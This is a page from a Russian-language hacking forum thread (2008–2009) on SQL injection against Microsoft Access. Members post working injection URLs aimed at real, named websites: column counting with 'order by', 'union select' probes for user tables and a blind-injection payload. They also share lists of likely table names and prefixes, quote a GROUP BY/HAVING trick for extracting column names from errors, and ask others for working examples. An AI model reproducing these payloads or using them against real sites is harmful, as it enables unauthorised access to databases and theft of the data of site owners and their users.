HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
Перезагрузить страницу Проведение SQL инъекций в Microsoft Access
   
 
Страница 3 из 5 < 1 2 3 4 5 >
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 30.08.2008, 13:01
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
Столкнулся с такой проблемой, возьму для примера Url из этой-же статьи
------------------
http://www.libertaegiustizia.it/blog_generale/messaggi02.asp?id=1
------------------
кол-во
http://www.libertaegiustizia.it/blog_generale/messaggi02.asp?id=1+order+by+8
------------------
вывод:
http://www.libertaegiustizia.it/blog_generale/messaggi02.asp?id=1+union+select+1,2,3,4,5,6,7,8+f rom+users

cannot find the input table or query 'users'
Нет таблицы, как я понимаю
------------------
http://www.libertaegiustizia.it/blog_generale/messaggi02.asp?id=1+union+select+1,2,3,4,5,6,7,8+f rom+user
Syntax error in FROM clause

А это что? Таблица есть , ошибка синтаксиса?
------------------
И такая фигня на нескольких сайтах

Киньте ,кому не трудно,любой рабочий пример с выводом, сюда или в ПМ.
 

  #22  
Старый 02.09.2008, 16:10
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию
Та же хрень,только на другом сайте.Исходя из логики,таблица юзер есть,но ошибка в запросе.
 

  #23  
Старый 02.09.2008, 16:12
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию
Мб это ещё может быть служебная команда или предикат, например as
 

  #24  
Старый 20.09.2008, 14:03
Kallisto
Новичок
Регистрация: 18.05.2007
Сообщений: 28
Провел на форуме:
133678

Репутация: 20
По умолчанию
"select ... from user"
использоваться нельзя, так как user это внутреннее имя и таблицой оно быть не может.
 

  #25  
Старый 07.10.2008, 08:40
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию
Цитата:
"select ... from user"
использоваться нельзя, так как user это внутреннее имя и таблицой оно быть не может.
user
password
day
catalog

По личному опыту
в 40% используетья префикс

tbl
tbl_

в 10% случаев
<имясайта>
<имясайта>_

По поводу системных таблиц
Цитата:
MSysACEs
MSysCmdbars
MSysModules
MSysModules2
MSysObjects
MSysQueries
MSysRelationships
Не разу не было доступа до них.

Повышение прав аналогично с mssql.
 

  #26  
Старый 20.12.2008, 22:21
NewBHack
Познающий
Регистрация: 24.11.2008
Сообщений: 35
Провел на форуме:
126200

Репутация: 4
По умолчанию
А может ктонить подробнее про повышение прав?
и еще на http://www.darkc0de.com/tutorials/MS...tion_Paper.txt читал про некоторую команду
table.columnfromerror1


You can find the columns names by using HAVEING BY, for example
HAVING 1=1 --
GROUP BY table.columnfromerror1 HAVING 1=1 --
GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 -- and on and on ...

Может кто-нить подробнее описать данную функу??? С примером, потому что как не пробовал не получается
Последний раз редактировалось NewBHack; 22.12.2008 в 00:57..
 

  #27  
Старый 25.06.2009, 11:32
2pick
Познающий
Регистрация: 17.03.2007
Сообщений: 98
Провел на форуме:
193152

Репутация: 45
Отправить сообщение для 2pick с помощью ICQ
По умолчанию
Никак немогу понять запроса
http://permnews.ru/l_otzv.asp?kt=5388'
причем здесь двойные скобки и как делать union select?
 

  #28  
Старый 25.06.2009, 13:26
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633

Репутация: 155
По умолчанию
Цитата:
Сообщение от 2pick  
Никак немогу понять запроса
http://permnews.ru/l_otzv.asp?kt=5388'
причем здесь двойные скобки и как делать union select?
тут баги нету.
 

  #29  
Старый 26.06.2009, 06:59
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию
http://permnews.ru/l_otzv.asp?kt=5388))%20and%201=1%20and%20((1=1
слепая
__________________
Карфаген должен быть разрушен...
 

  #30  
Старый 07.10.2009, 04:21
IamDevil
Новичок
Регистрация: 10.05.2009
Сообщений: 6
Провел на форуме:
21038

Репутация: 0
Отправить сообщение для IamDevil с помощью ICQ
По умолчанию
Может это считается за флуд, но у меня проблемка с Access'ом - при нажатии на нужное значение столбца(которое мне надо исправить) появляется такая ошибка: "Возникла ошибка при установке связи в приложении Microsoft Access с сервером OLE или элементом управления ActiveX" В режиме конструктора видно, что это Ole-Объект, но как его можно модифицировать?
P.S. На машине запущена служба, которая и записывает значение(
тот самый Ole-объект) в файл. Моя аська в профиле. Плиз, помогите.
 
 
Страница 3 из 5 < 1 2 3 4 5 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
3.61 гига книжек от майкрософт Talisman Болталка 0 27.03.2007 19:38



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ